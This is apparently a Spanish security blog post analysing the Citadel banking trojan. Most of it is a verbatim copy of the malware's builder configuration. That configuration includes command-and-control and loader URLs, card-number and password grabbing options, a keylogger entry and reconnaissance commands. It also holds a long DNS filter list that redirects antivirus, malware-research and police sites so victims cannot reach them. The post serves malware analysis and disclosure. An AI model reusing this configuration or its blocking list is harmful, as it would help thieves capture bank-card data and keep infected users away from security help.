En este documento se
presenta el fichero de configuración que utiliza el troyano Citadel , sucesor
del famoso troyano bancario Zeus y que se utiliza para crear el binario
malicioso que va a infectar a los usuarios y que posteriormente se comunicara
con el servidor donde este alojada toda la infraestructura criminal.
Entre las novedades de esta
nueva versión destaca su configuración modular
dependiendo de los complementos que se hayan comprado en el mercado
negro.
Uno de estos módulos se
trata del CardSwipe ( Banda Magnética) cuya finalidad es la captura de todos los datos de
las tarjetas de crédito necesarios para operar fraudulentamente con ellas.
En este fichero de
configuración los criminales tienen activada esta opción:
enable_luhn10_get 1
enable_luhn10_post 1
Incluso se ha logrado
reproducir la inyección que realiza el troyano en la máquina infectada
capturando la pantalla que presenta para que el usuario introduzca todos sus
datos de la tarjeta de crédito cuando accede a su banca por Internet.
Se observa como se solicita
el numero secreto del PIN ( ATM Pin) y su código de identificación de la
seguridad social (SSN) , datos que nunca son solicitados al cliente bajo
ninguna circunstancia.
Otros parámetros de la
configuración permite la captura de secuencias de video del equipo infectado
use_module_video
0
entry
"Video"
quality 1
length 500
end
Esto es muy útil para
capturar la secuencia en tiempo real cuando el usuario introduce los códigos
secretos de autorización de transferencia y evadir los sistemas de
autenticación mediante teclado virtual.
Otros comandos también permiten capturar los
datos enviados a través del navegador Chrome, habilitar la protección contra
máquinas virtuales es impedir que el binario pueda ser analizado en estos
entornos, desactivar el envio de cookies y bloquear el acceso a los sitios webs
de las compañías de antivirus y protección contra malware. Redirigiendo al
usuario a la pagina principal de Google ( 209.85.229.104) cada vez que intenta acceder a ellas.
Para ello no modifica el archivo hosts del equipo infectado sino que controla
la cache DNS del equipo.
Incluso también bloquea el
acceso a las paginas de los cuerpos de seguridad y de lucha contra el
cibercrimen.
A continuación pasamos a
mostrar la configuración del Citadel Builder 1.3.4.5
;; Default
config + updated AV's list (redirect to google.com)
;; Citadel
Builder 1.3.4.5
;; SHORT
MANUAL BELOW ------------>
;;
url_config1 is required!!! url_config2 & url_config3 are optional, you can
setup it like a reserve config host.
;;
report_software - report to gate about installed firewall,antivirus,software: 1
is enabled
;;
disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off.
0 is enabled.
;;
enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it
on a GET parsing by LUHN10 algorithm.
;;
enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it
on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).
;;
use_module_video 1/0 - Do you really want to use video grabber? If no, please
switch it off. 1 is enabled.
;;
disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP : // logs
grabber? 1 is enabled.
;;
package_max_size 50 - logs reports transmission size(KB), stay it as default.
;;
timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This
option takes exe link from "url_loader" section.
;;
antiemulation_enable 0/1 - if you enable it, you can't test it on virtual
machines such as VMWare/Virtualbox.
;;
disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and
.sol files will be deleted.
;; For
other information please open the "Personal Manual"
;; IF YOU
DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.
;;
<------------------ END OF SHORT MANUAL.
entry
"StaticConfig"
botnet "main"
timer_config 15 20
timer_logs
7 20
timer_stats 10 20
timer_modules 7 10
timer_autoupdate 8
url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"
remove_certs 1
; disable_tcpserver 0
disable_cookies 0
disable_httpgrabber 1
report_software 1
disable_antivirus 0
enable_luhn10_get 1
enable_luhn10_post 1
antiemulation_enable 0
encryption_key "*******************************"
use_module_video 0
end
entry
"DynamicConfig"
url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
url_server "http : //gremlindefault.net/mainsession/redir.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
"http : //gremlindefault.net/mainsession/game_install.bin"
end
entry "WebFilters"
"!http : //*"
end
entry "WebDataFilters"
;"http : //mail.rambler.ru/*"
"passw;login"
end
entry "WebFakes"
;"http : //www.google.com" "http
: //www.yahoo.com" "GP" "" ""
end
entry "DnsFilters"
bitdefender.com=209.85.229.104
download.bitdefender.com=209.85.229.104
update.bitdefender.com=209.85.229.104
wfbs51-p.activeupdate.trendmicro.com=209.85.229.104
wfbs60-p.activeupdate.trendmicro.com=209.85.229.104
iau.trendmicro.com=209.85.229.104
licenseupdate.trendmicro.com=209.85.229.104
csm-as.activeupdate.trendmicro.com=209.85.229.104
wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104
oc.activeupdate.trendmicro.com=209.85.229.104
update.avg.com=209.85.229.104
update.grisoft.com=209.85.229.104
backup.avg.cz=209.85.229.104
backup.grisoft.cz=209.85.229.104
files2.grisoft.cz=209.85.229.104
files2.avg.cz=209.85.229.104
download.grisoft.cz=209.85.229.104
download.avg.cz=209.85.229.104
akamai.grisoft.cz=209.85.229.104
akamai.grisoft.cz.edgesuite.net=209.85.229.104
akamai.avg.cz=209.85.229.104
akamai.avg.cz.edgesuite.net=209.85.229.104
akamai.grisoft.com=209.85.229.104
akamai.avg.com=209.85.229.104
akamai.grisoft.com.edgesuite.net=209.85.229.104
akamai.avg.com.edgesuite.net=209.85.229.104
data-cdn.mbamupdates.com=209.85.229.104
su.pctools.com=209.85.229.104
pctools.com=209.85.229.104
download.lavasoft.com=209.85.229.104
secure.lavasoft.com=209.85.229.104
lavasoft.com=209.85.229.104
bitdefender.nl=209.85.229.104
virustotal.com=209.85.229.104
trendmicro.nl=209.85.229.104
trendmicro.com.au=209.85.229.104
www.trendmicro.com.au=209.85.229.104
securesoft.com.au=209.85.229.104
avira.com.au=209.85.229.104
gratissoftwaresite.nl=209.85.229.104
nod32.com.au=209.85.229.104
pandasecurity.com.au=209.85.229.104
lavasoft.com.au=209.85.229.104
avg.com.au=209.85.229.104
symantec-norton.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
forums.malwarebytes.org=209.85.229.104
malwarebytes.org=209.85.229.104
pchelpforum.com=209.85.229.104
pchelpforum.com=209.85.229.104
forums.cnet.com=209.85.229.104
techsupportforum.com=209.85.229.104
gratissoftware.nu=209.85.229.104
majorgeeks.com=209.85.229.104
forums.pcworld.com=209.85.229.104
antivirus.microbe.com.au=209.85.229.104
avast.com.au=209.85.229.104
avg-antivirus.com.au=209.85.229.104
nortonantiviruscenter.com=209.85.229.104
threatmetrix.com=209.85.229.104
www.zonealarm.com=209.85.229.104
firewallguide.com=209.85.229.104
auditmypc.com=209.85.229.104
comodo.com=209.85.229.104
free-firewall.org=209.85.229.104
schoonepc.nl=209.85.229.104
iopus.com=209.85.229.104
tucows.com=209.85.229.104
avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104
superantispyware.com.au=209.85.229.104
superantispyware.com=209.85.229.104
harveynorman.com.au=209.85.229.104
ca-store.com.au=209.85.229.104
netfreighters.com.au=209.85.229.104
securetec.com.au=209.85.229.104
anti-spyware.com.au=209.85.229.104
virusscan.jotti.org=209.85.229.104
virscan.org=209.85.229.104
antivir.ru=209.85.229.104
analysis.avira.com=209.85.229.104
hijackthis.de=209.85.229.104
uploadmalware.com=209.85.229.104
emsisoft.com=209.85.229.104
kaspersky.co.uk=209.85.229.104
bitdefender.co.uk=209.85.229.104
eset.co.uk=209.85.229.104
webroot.com=209.85.229.104
gdatasoftware.co.uk=209.85.229.104
pcpro.co.uk=209.85.229.104
webroot.co.uk=209.85.229.104
cyprotect.com=209.85.229.104
cloudantivirus.com=209.85.229.104
drweb-antivir.it=209.85.229.104
escanav.com=209.85.229.104
clamwin.com=209.85.229.104
nod32.nl=209.85.229.104
webroot.nl=209.85.229.104
av.eu=209.85.229.104
vergelijk.nl=209.85.229.104
antivirusvergelijk.nl=209.85.229.104
virussen.upc.nl=209.85.229.104
antivirus.startpagina.nl=209.85.229.104
avastav.nl=209.85.229.104
defenx.nl=209.85.229.104
gdata.nl=209.85.229.104
bitdefender.nl=209.85.229.104
removevirus.org=209.85.229.104
windows.microsoft.com=209.85.229.104
answers.microsoft.com=209.85.229.104
myantispyware.com=209.85.229.104
krebsonsecurity.com=209.85.229.104
antivirus.about.com=209.85.229.104
cleanuninstall.com=209.85.229.104
staples.com=209.85.229.104
esetindia.com=209.85.229.104
mcafee.free-trials.net=209.85.229.104
antivir-2012.com=209.85.229.104
panda-antivirus.en.softonic.com=209.85.229.104
softonic.com=209.85.229.104
freeantivirushelp.com=209.85.229.104
scanwith.com=209.85.229.104
bestantivirusreviewed.com=209.85.229.104
virus-help.net=209.85.229.104
cleanallspyware.com=209.85.229.104
kingsoftsecurity.com=209.85.229.104
threatfire.com=209.85.229.104
freeavg.com=209.85.229.104
clamav.net=209.85.229.104
pcthreat.com=209.85.229.104
2-viruses.com=209.85.229.104
trojan-killer.ne=209.85.229.104
virusinfo.info=209.85.229.104
www.virusinfo.info=209.85.229.104
projecthoneypot.org=209.85.229.104
www.projecthoneypot.org=209.85.229.104
novirus.ru=209.85.229.104
www.novirus.ru=209.85.229.104
anti-malware.com=209.85.229.104
www.anti-malware.com=209.85.229.104
offensivecomputing.net=209.85.229.104
www.offensivecomputing.net=209.85.229.104
zeustracker.abuse.ch=209.85.229.104
www.zeustracker.abuse.ch=209.85.229.104
www.malekal.com=209.85.229.104
www3.malekal.com=209.85.229.104
forum.malekal.com=209.85.229.104
www.threatexpert.com=209.85.229.104
threatexpert.com=209.85.229.104
www.microsoft.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.virustotal.com=209.85.229.104
virusscan.jotti.org=209.85.229.104
www.av-comparatives.org=209.85.229.104
av-comparatives.org=209.85.229.104
av-test.org=209.85.229.104
www.av-test.org=209.85.229.104
www.scanwith.com=209.85.229.104
trendmicro.com.au=209.85.229.104
kasperskyanz.com.au=209.85.229.104
bitdefender.com.au=209.85.229.104
eset.com.au=209.85.229.104
vet.com.au=209.85.229.104
sm.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
toolbar.avg.com=209.85.229.104
stats.avg.com=209.85.229.104
www.virusbtn.com=209.85.229.104
adwarereport.com=209.85.229.104
avg.com.au=209.85.229.104
www.adwarereport.com=209.85.229.104
malwarebytes.org=209.85.229.104
www.malwarebytes.org=209.85.229.104
dw.com.com=209.85.229.104
nss-shasta-rrs.symantec.com=209.85.229.104
spywarewarrior.com=209.85.229.104
www.spywarewarrior.com=209.85.229.104
avsoft.ru=209.85.229.104
www.avsoft.ru=209.85.229.104
onecare.live.com=209.85.229.104
anubis.iseclab.org=209.85.229.104
wepawet.iseclab.org=209.85.229.104
iseclab.org=209.85.229.104
www.iseclab.org=209.85.229.104
www.freespaceinternetsec=209.85.229.104urity.com
freespaceinternetsecurit=209.85.229.104y.com
sunbelt-software.com=209.85.229.104
www.sunbelt-software.com=209.85.229.104
www.prevx.com=209.85.229.104
prevx.com=209.85.229.104
analysis.seclab.tuwien.a=209.85.229.104c.at
www.joebox.org=209.85.229.104
joebox.org=209.85.229.104
gmer.net=209.85.229.104
www.gmer.net=209.85.229.104
antirootkit.com=209.85.229.104
www.antirootkit.com=209.85.229.104
sectools.org=209.85.229.104
www.sandboxie.com=209.85.229.104
sandboxie.com=209.85.229.104
nepenthes.mwcollect.org=209.85.229.104
mwcollect.org=209.85.229.104
www.amtso.org=209.85.229.104
amtso.org=209.85.229.104
www.nsslabs.com=209.85.229.104
nsslabs.com=209.85.229.104
www.icsalabs.com=209.85.229.104
icsalabs.com=209.85.229.104
www.checkvir.com=209.85.229.104
checkvir.com=209.85.229.104
www.check-mark.com=209.85.229.104
check-mark.com=209.85.229.104
www.protectstar-testlab.=209.85.229.104org
protectstar-testlab.org=209.85.229.104
www.anti-malware-test.co=209.85.229.104m
anti-malware-test.com=209.85.229.104
av-test.de=209.85.229.104
www.av-test.de=209.85.229.104
www.wildlist.org=209.85.229.104
wildlist.org=209.85.229.104
www.aavar.org=209.85.229.104
aavar.org=209.85.229.104
centralops.net=209.85.229.104
www.staysafeonline.info=209.85.229.104
staysafeonline.info=209.85.229.104
www.rokop-security.de=209.85.229.104
rokop-security.de=209.85.229.104
www.wilderssecurity.com=209.85.229.104
wilderssecurity.com=209.85.229.104
www.superantispyware.com=209.85.229.104
superantispyware.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.kaspersky.com=209.85.229.104
www.kaspersky.ru=209.85.229.104
kaspersky.ru=209.85.229.104
www.avp.ru=209.85.229.104
avp.ru=209.85.229.104
www.viruslist.com=209.85.229.104
viruslist.com=209.85.229.104
www.viruslist.ru=209.85.229.104
www.kaspersky-antivirus.ru=209.85.229.104
kaspersky-antivirus.ru=209.85.229.104
downloads1.kaspersky-labs.com=209.85.229.104
downloads2.kaspersky-labs.com=209.85.229.104
downloads3.kaspersky-labs.com=209.85.229.104
downloads4.kaspersky-labs.com=209.85.229.104
downloads5.kaspersky-labs.com=209.85.229.104
downloads-us1.kaspersky-labs.com=209.85.229.104
downloads-us2.kaspersky-labs.com=209.85.229.104
downloads-us3.kaspersky-labs.com=209.85.229.104
downloads-eu1.kaspersky-labs.com=209.85.229.104
downloads-eu2.kaspersky-labs.com=209.85.229.104
kavdumps.kaspersky.com=209.85.229.104
www.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.ru=209.85.229.104
kasperskyclub.ru=209.85.229.104
kasperskyclub.com=209.85.229.104
ftp.kasperskylab.ru=209.85.229.104
ftp.kaspersky.ru=209.85.229.104
ftp.kaspersky-labs.com=209.85.229.104
data.kaspersky.ru=209.85.229.104
z-oleg.com=209.85.229.104
www.z-oleg.com=209.85.229.104
drweb.com=209.85.229.104
www.drweb.com=209.85.229.104
freedrweb.com=209.85.229.104
www.freedrweb.com=209.85.229.104
drweb.com.ua=209.85.229.104
www.drweb.com.ua=209.85.229.104
drweb.ru=209.85.229.104
www.drweb.ru=209.85.229.104
av-desk.com=209.85.229.104
www.av-desk.com=209.85.229.104
drweb.net=209.85.229.104
www.drweb.net=209.85.229.104
ftp.drweb.com=209.85.229.104
dr-web.ru=209.85.229.104
www.dr-web.ru=209.85.229.104
download.drweb.com=209.85.229.104
support.drweb.com=209.85.229.104
updates.sald.com=209.85.229.104
sald.com=209.85.229.104
www.sald.com=209.85.229.104
drweb.imshop.de=209.85.229.104
safeweb.norton.com=209.85.229.104
www.safeweb.norton.com=209.85.229.104
www.symantec.com=209.85.229.104
shop.symantecstore.com=209.85.229.104
liveupdate.symantec.com=209.85.229.104
liveupdate.symantecliveu=209.85.229.104pdate.com
service1.symantec.com=209.85.229.104
www.service1.symantec.co=209.85.229.104m
security.symantec.com=209.85.229.104
liveupdate.symantec.d4p.=209.85.229.104net
securityresponse.symante=209.85.229.104c.com
sygate.com=209.85.229.104
www.sygate.com=209.85.229.104
esetnod32.ru=209.85.229.104
www.esetnod32.ru=209.85.229.104
eset.com=209.85.229.104
www.eset.com=209.85.229.104
eset.com.ua=209.85.229.104
www.eset.com.ua=209.85.229.104
nod32.com.ua=209.85.229.104
www.nod32.com.ua=209.85.229.104
download.eset.com=209.85.229.104
update.eset.com=209.85.229.104
eset.eu=209.85.229.104
www.eset.eu=209.85.229.104
nod32.it=209.85.229.104
www.nod32.it=209.85.229.104
nod32.su=209.85.229.104
www.nod32.su=209.85.229.104
nod-32.ru=209.85.229.104
www.nod-32.ru=209.85.229.104
allnod.com=209.85.229.104
www.allnod.com=209.85.229.104
allnod.info=209.85.229.104
www.allnod.info=209.85.229.104
virusall.ru=209.85.229.104
www.virusall.ru=209.85.229.104
nod32eset.org=209.85.229.104
www.nod32eset.org=209.85.229.104
eset.sk=209.85.229.104
www.eset.sk=209.85.229.104
nod32.nl=209.85.229.104
www.nod32.nl=209.85.229.104
dl1.antivir.de=209.85.229.104
dl2.antivir.de=209.85.229.104
dl3.antivir.de=209.85.229.104
dl4.antivir.de=209.85.229.104
free-av.com=209.85.229.104
www.free-av.com=209.85.229.104
free-av.de=209.85.229.104
www.free-av.de=209.85.229.104
avira.com=209.85.229.104
www.avira.com=209.85.229.104
avira.de=209.85.229.104
www.avira.de=209.85.229.104
www1.avira.com=209.85.229.104
dlpro.antivir.com=209.85.229.104
forum.avira.com=209.85.229.104
www.forum.avira.com=209.85.229.104
avirus.ru=209.85.229.104
www.avirus.ru=209.85.229.104
avira-antivir.ru=209.85.229.104
www.avira-antivir.ru=209.85.229.104
avirus.com.ua=209.85.229.104
www.avirus.com.ua=209.85.229.104
mcafee.com=209.85.229.104
www.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
us.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
de.mcafee.com=209.85.229.104
ca.mcafee.com=209.85.229.104
fr.mcafee.com=209.85.229.104
au.mcafee.com=209.85.229.104
es.mcafee.com=209.85.229.104
it.mcafee.com=209.85.229.104
uk.mcafee.com=209.85.229.104
mx.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
mcafee-online.com=209.85.229.104
www.mcafee-online.com=209.85.229.104
mcafeesecurity.com=209.85.229.104
www.mcafeesecurity.com=209.85.229.104
mcafeesecure.com=209.85.229.104
www.mcafeesecure.com=209.85.229.104
avertlabs.com=209.85.229.104
www.avertlabs.com=209.85.229.104
download.nai.com=209.85.229.104
nai.com=209.85.229.104
www.nai.com=209.85.229.104
secure.nai.com=209.85.229.104
eu.shopmcafee.com=209.85.229.104
shop.mcafee.com=209.85.229.104
siblog.mcafee.com=209.85.229.104
mcafeestore.com=209.85.229.104
www.mcafeestore.com=209.85.229.104
service.mcafee.com=209.85.229.104
siteadvisor.com=209.85.229.104
www.siteadvisor.com=209.85.229.104
scanalert.com=209.85.229.104
www.drsolomon.com=209.85.229.104
mcafee-at-home.com=209.85.229.104
wwww.mcafee-at-home.com=209.85.229.104
networkassociates.com=209.85.229.104
www.networkassociates.com=209.85.229.104
avast.ru=209.85.229.104
www.avast.ru=209.85.229.104
avast.com=209.85.229.104
www.avast.com=209.85.229.104
onlinescan.avast.com=209.85.229.104
download1.avast.com=209.85.229.104
download2.avast.com=209.85.229.104
download3.avast.com=209.85.229.104
download4.avast.com=209.85.229.104
download5.avast.com=209.85.229.104
download6.avast.com=209.85.229.104
download7.avast.com=209.85.229.104
free.avg.com=209.85.229.104
au.norton.com=209.85.229.104
trustdefender.com=209.85.229.104
avg.com=209.85.229.104
www.avg.com=209.85.229.104
sshop.avg.com=209.85.229.104
pctools.com=209.85.229.104
www.grisoft.cz=209.85.229.104
www.grisoft.com=209.85.229.104
free.grisoft.com=209.85.229.104
bitdefender.com=209.85.229.104
www.bitdefender.com=209.85.229.104
msecn.net=209.85.229.104
bitdefender.de=209.85.229.104
www.bitdefender.de=209.85.229.104
bitdefender.com.ua=209.85.229.104
www.bitdefender.com.ua=209.85.229.104
bitdefender.ru=209.85.229.104
www.bitdefender.ru=209.85.229.104
myaccount.bitdefender.co,=209.85.229.104
download.bitdefender.com=209.85.229.104
ftp.bitdefender.com=209.85.229.104
forum.bitdefender.com=209.85.229.104
upgrade.bitdefender.com=209.85.229.104
agnitum.ru=209.85.229.104
www.agnitum.ru=209.85.229.104
agnitum.com=209.85.229.104
www.agnitum.com=209.85.229.104
agnitum.de=209.85.229.104
www.agnitum.de=209.85.229.104
outpostfirewall.com=209.85.229.104
www.outpostfirewall.com=209.85.229.104
dl1.agnitum.com=209.85.229.104
dl2.agnitum.com=209.85.229.104
antivirus.comodo.com=209.85.229.104
comodo.com=209.85.229.104
www.comodo.com=209.85.229.104
forums.comodo.com=209.85.229.104
comodogroup.com=209.85.229.104
www.comodogroup.com=209.85.229.104
personalfirewall.comodo.com=209.85.229.104
www.personalfirewall.com=209.85.229.104
hackerguardian.com=209.85.229.104
www.hackerguardian.com=209.85.229.104
www.nsclean.com=209.85.229.104
nsclean.com=209.85.229.104
clamav.net=209.85.229.104
www.clamav.net=209.85.229.104
db.local.clamav.net=209.85.229.104
clamsupport.sourcefire.com=209.85.229.104
lurker.clamav.net=209.85.229.104
wiki.clamav.net=209.85.229.104
w32.clamav.net=209.85.229.104
lists.clamav.net=209.85.229.104
clamwin.com=209.85.229.104
www.clamwin.com=209.85.229.104
ru.clamwin.com=209.85.229.104
gietl.com=209.85.229.104
www.gietl.com=209.85.229.104
clamav.dyndns.org=209.85.229.104
f-secure.com=209.85.229.104
www.f-secure.com=209.85.229.104
support.f-secure.com=209.85.229.104
f-secure.ru=209.85.229.104
www.f-secure.ru=209.85.229.104
ftp.f-secure.com=209.85.229.104
europe.f-secure.com=209.85.229.104
www.europe.f-secure.com=209.85.229.104
f-secure.de=209.85.229.104
www.f-secure.de=209.85.229.104
support.f-secure.de=209.85.229.104
ftp.f-secure.de=209.85.229.104
f-secure.co.uk=209.85.229.104
www.f-secure.co.uk=209.85.229.104
retail.sp.f-secure.com=209.85.229.104
retail01.sp.f-secure.com=209.85.229.104
retail02.sp.f-secure.com=209.85.229.104
ftp.europe.f-secure.com=209.85.229.104
norman.com=209.85.229.104
www.norman.com=209.85.229.104
download.norman.no=209.85.229.104
sandbox.norman.no=209.85.229.104
norman.no=209.85.229.104
www.norman.no=209.85.229.104
niuone.norman.no=209.85.229.104
pandasecurity.com=209.85.229.104
www.pandasecurity.com=209.85.229.104
viruslab.ru=209.85.229.104
www.viruslab.ru=209.85.229.104
pandasoftware.com=209.85.229.104
www.pandasoftware.com=209.85.229.104
acs.pandasoftware.com=209.85.229.104
www.pandasoftware.es=209.85.229.104
anti-virus.by=209.85.229.104
www.anti-virus.by=209.85.229.104
virusblokada.ru=209.85.229.104
www.virusblokada.ru=209.85.229.104
vba32.de=209.85.229.104
www.vba32.de=209.85.229.104
ftp.nai.com=209.85.229.104
secuser.com=209.85.229.104
www.secuser.com=209.85.229.104
tds.diamondcs.com.au=209.85.229.104
windowsupdate.microsoft.com=209.85.229.104
lavasoftusa.com=209.85.229.104
www.lavasoftusa.com=209.85.229.104
lavasoftusa.de=209.85.229.104
www.lavasoftusa.de=209.85.229.104
diamondcs.com.au=209.85.229.104
shop.ca.com=209.85.229.104
downloads.my-etrust.com=209.85.229.104
v4.windowsupdate.microsoft.com=209.85.229.104
v5.windowsupdate.microsoft.com=209.85.229.104
noadware.net=209.85.229.104
www.noadware.net=209.85.229.104
zonelabs.com=209.85.229.104
www.zonelabs.com=209.85.229.104
moosoft.com=209.85.229.104
www.moosoft.com=209.85.229.104
secuser.model-fx.com=209.85.229.104
pccreg.antivirus.com=209.85.229.104
k-otik.com=209.85.229.104
vupen.com=209.85.229.104
www.vupen.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
trendmicro.com=209.85.229.104
www.trendmicro.com=209.85.229.104
us.trendmicro.com=209.85.229.104
uk.trendmicro.com=209.85.229.104
de.trendmicro.com=209.85.229.104
fr.trendmicro.com=209.85.229.104
es.trendmicro.com=209.85.229.104
au.trendmicro.com=209.85.229.104
it.trendmicro.com=209.85.229.104
br.trendmicro.com=209.85.229.104
antivirus.cai.com=209.85.229.104
sophos.com=209.85.229.104
www.sophos.com=209.85.229.104
securitoo.com=209.85.229.104
nordnet.com=209.85.229.104
www.nordnet.com=209.85.229.104
avgfrance.com=209.85.229.104
www.avgfrance.com=209.85.229.104
antivirus-online.de=209.85.229.104
www.antivirus-online.de=209.85.229.104
ftp.esafe.com=209.85.229.104
ftp.microworldsystems.com=209.85.229.104
ftp.ca.co=209.85.229.104
files.trendmicro-europe.com=209.85.229.104
inline-software.de=209.85.229.104
ravantivirus.com=209.85.229.104
www.ravantivirus.com=209.85.229.104
f-prot.com=209.85.229.104
www.f-prot.com=209.85.229.104
files.f-prot.com=209.85.229.104
secure.f-prot.com=209.85.229.104
vsantivirus.com=209.85.229.104
www.vsantivirus.com=209.85.229.104
openantivirus.org=209.85.229.104
www.openantivirus.org=209.85.229.104
www3.ca.com=209.85.229.104
dialognauka.ru=209.85.229.104
www.dialognauka.ru=209.85.229.104
anti-virus-software-review.com=209.85.229.104
www.anti-virus-software-review.com=209.85.229.104
www.vet.com.au=209.85.229.104
antiviraldp.com=209.85.229.104
www.antiviraldp.com=209.85.229.104
www.proantivirus.com=209.85.229.104
pestpatrol.com=209.85.229.104
www.pestpatrol.com=209.85.229.104
simplysup.com=209.85.229.104
www.simplysup.com=209.85.229.104
misec.net=209.85.229.104
www.misec.net=209.85.229.104
www1.my-etrust.com=209.85.229.104
authentium.com=209.85.229.104
www.authentium.com=209.85.229.104
finjan.com=209.85.229.104
www.finjan.com=209.85.229.104
www.ikarus-software.at=209.85.229.104
www.ika-rus.com=209.85.229.104
ika-rus.com=209.85.229.104
tinysoftware.com=209.85.229.104
www.tinysoftware.com=209.85.229.104
visualizesoftware.com=209.85.229.104
www.visualizesoftware.com=209.85.229.104
kerio.com=209.85.229.104
www.kerio.com=209.85.229.104
www.kerio.eu=209.85.229.104
www.zonelabs.com=209.85.229.104
zonelog.co.uk=209.85.229.104
www.zonelog.co.uk=209.85.229.104
webroot.com=209.85.229.104
www.webroot.com=209.85.229.104
www.lavasoft.nu=209.85.229.104
spywareguide.com=209.85.229.104
www.spywareguide.com=209.85.229.104
spyblocker-software.com=209.85.229.104
www.spyblocker-software.com=209.85.229.104
www.spamhaus.org=209.85.229.104
spamcop.net=209.85.229.104
www.spamcop.net=209.85.229.104
bobbear.co.uk=209.85.229.104
www.bobbear.co.uk=209.85.229.104
domaintools.com=209.85.229.104
www.domaintools.com=209.85.229.104
centralops.net=209.85.229.104
www.centralops.net=209.85.229.104
www.robtex.com=209.85.229.104
dnsstuff.com=209.85.229.104
www.dnsstuff.com=209.85.229.104
ripe.net=209.85.229.104
www.ripe.net=209.85.229.104
www.met.police.uk=209.85.229.104
nbi.gov.ph=209.85.229.104
www.nbi.gov.ph=209.85.229.104
www.police.gov.hk=209.85.229.104
treasury.gov=209.85.229.104
www.treasury.gov=209.85.229.104
cybercrime.gov=209.85.229.104
www.cybercrime.gov=209.85.229.104
www.cybercrime.ch=209.85.229.104
enisa.europa.eu=209.85.229.104
www.enisa.europa.eu=209.85.229.104
www.interpol.int=209.85.229.104
www.fsa.gov.uk=209.85.229.104
www.companies-house.gov.uk=209.85.229.104
fraudaid.com=209.85.229.104
www.fraudaid.com=209.85.229.104
scambusters.org=209.85.229.104
www.scambusters.org=209.85.229.104
spamtrackers.eu=209.85.229.104
www.spamtrackers.eu=209.85.229.104
end
entry "CmdList"
"net view"
"tasklist"
"set"
end
entry "Keylogger"
processes "calc___.exe"
time 1
end
entry "Video"
quality 1
length 500
end
end
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.